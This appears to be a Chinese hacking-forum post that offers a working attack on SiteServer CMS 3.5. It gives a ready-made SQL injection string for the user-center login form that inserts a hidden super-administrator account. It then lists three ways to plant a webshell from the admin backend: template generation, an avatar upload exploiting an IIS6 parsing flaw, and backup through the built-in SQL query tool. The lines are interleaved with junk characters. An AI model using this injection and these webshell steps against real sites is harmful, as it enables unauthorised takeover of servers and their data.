经测试秒杀最新的3.5版9 a+ E8 \/ J* J V3 d6 n) x: D
. Q* w4 U' P6 [/ A" V- [stieserver官网:www.siteserver.cn
1 p$ h7 w5 f: k# Y: v; C, t/ Q3 ?/ a. k7 Z+ n
( U) i1 \9 l* `2 u1 t# {
/ ?2 q- h- q$ Y% iEXP:, V6 n6 Z- p1 O, a( k7 Y
4 h8 D. J1 l, j% c# u2 }3 M直接访问UserCenter/login.aspx& B2 m3 i% i7 M( g" Z
$ i% p8 p% n. ~
0 d7 u4 R( j) f7 `( @; r) j' ^
用户名处输入:& a) v' W8 }3 r8 {' E! G2 W3 A
4 W, m; f8 X# b& m- G: h. s
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--. b+ w$ f5 J: S& H
' c# ]% V+ N" V. ?0 f! T# M$ w0 S 3 U& `9 d7 ^( H- b
* u) t+ N( K2 P密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
2 V1 }+ H( p$ G; O/ G4 H6 s6 A
8 G0 \1 i; z. y
: q" n6 t0 q5 v1 C g* @7 p/ B1 {/ q
" h2 O/ F8 m1 q( R之后再访问后台SiteServer/login.aspx用插入的用户登陆. Y7 N+ D+ q5 N+ z, x
& V) c$ j7 `) K2 y0 ^
/ R4 M" Y( G d3 K& ?4 A. `6 K' H! G5 Z: ~$ u4 ?
后台拿webshell的三种方法:
2 G/ B) z6 ?6 m% d4 L. a" q6 C# v3 i* x
一、
. I! {. u) w0 V% w3 |3 f! Q
" e8 t- r. V( D( \6 W站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx$ e0 V! C5 F+ e( }7 y" l. E, z
/ o" D# ~# ]) k/ N& ?
二、
2 i( l) J- C) _2 q: W4 o2 S" V( l% x
W; R+ u9 L3 D0 }5 _& t* i成员权限-》添加用户-》用户名为:1.asp
1 A% ^! y! g7 ?) g- u8 r9 n% L3 ]* U3 T) E0 w$ Z. @( j
http://127.0.0.1/usercenter/5 U/ ^3 f$ @" t, U6 P
, \( u9 W* h e6 N用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell" ^. T. }" q! [( k3 |
j/ y: h' {( @1 [. e/ C+ {
(ps:后台添加用户时不会验证是否含有非法字符)
& U9 N1 i) D" {& W7 K7 K7 n, m2 ]8 A9 e9 [, e
三、1 D5 I" ~, V; T; x5 u4 O, M
& N `; K$ L5 \# u
系统工具-》实用工具-》机器参数查看2 k7 ?7 X- j' {! e$ |; C* m
可以看到数据库类型、名称,WEB路径
! C- V; l5 U5 N
) |2 q8 |3 ]9 O- @" \& s/ `系统工具-》数据库工具-》SQL语句查询
# s: k0 M* o1 f, `: u6 Z+ H这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
% i. W, h, ?7 [6 Z6 C* V8 M* U5 U/ Q9 X5 y
|